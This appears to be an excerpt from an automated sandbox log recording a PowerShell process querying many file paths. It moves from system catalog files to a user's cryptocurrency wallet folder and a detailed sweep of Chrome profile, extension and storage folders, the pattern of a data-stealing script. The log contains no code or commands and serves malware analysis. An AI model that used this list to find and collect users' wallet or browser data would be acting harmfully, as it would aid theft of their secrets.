Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Zephyr\wallets VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\Headlights VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\RTTransfer VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Spelling VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation
